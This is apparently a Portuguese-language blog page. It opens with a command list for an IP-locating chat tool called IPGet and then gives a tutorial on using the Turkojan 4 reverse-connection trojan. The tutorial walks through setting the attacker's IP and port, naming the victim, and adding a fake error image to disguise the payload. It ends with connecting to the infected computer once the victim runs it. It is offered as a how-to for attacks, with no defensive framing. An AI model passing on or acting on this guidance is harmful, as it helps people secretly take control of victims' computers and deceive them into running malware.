mostra o ip da pessoa

/iplocate
localiza o origina IP

/iplog
mostra os últimos acontecimentos relacionados com a IPGet
,
útil para visualizar se você perdeu algum popup

/ipconfig
mostra as opções

/ipabout
mostra a janela sobre o IPGet

/iphelp
abre o “readme.txt” para ajuda-lo

/ipupdate
vê se tem novas versões do IPGet

/ipshare
compartilha o IPGet com seus contatos


Como Usar TurkoJan 4

Como Usar TurkoJan 4 | Tutorial TurkoJan 4
Vamos lá pessoal vou ensinar agora como usar o Turkojan 4.


Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Clique Nesta Barra Para Ver a Imagem Maior.

Bem pessoal como esse é um trojan de Conexão reversa vamos configuralo assim:
1- Seu IP
2- Porta do servidor
3- nome da vítima
4- nome do arquivo que vai ser registrado
5- Nome do arquivo
6- Imagem de erro que aparecerá ao executar o servidor
7- Salva o servidor

Clique Nesta Barra Para Ver a Imagem Maior.


Clique Nesta Barra Para Ver a Imagem Maior.

Após a pessoa executar o servidor clique em iniciar para que o computador dela se conecte com o seu e pronto!
Clique Nesta Barra Para Ver a Imagem Maior.

Aqui a imagem do Computador Conectado

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes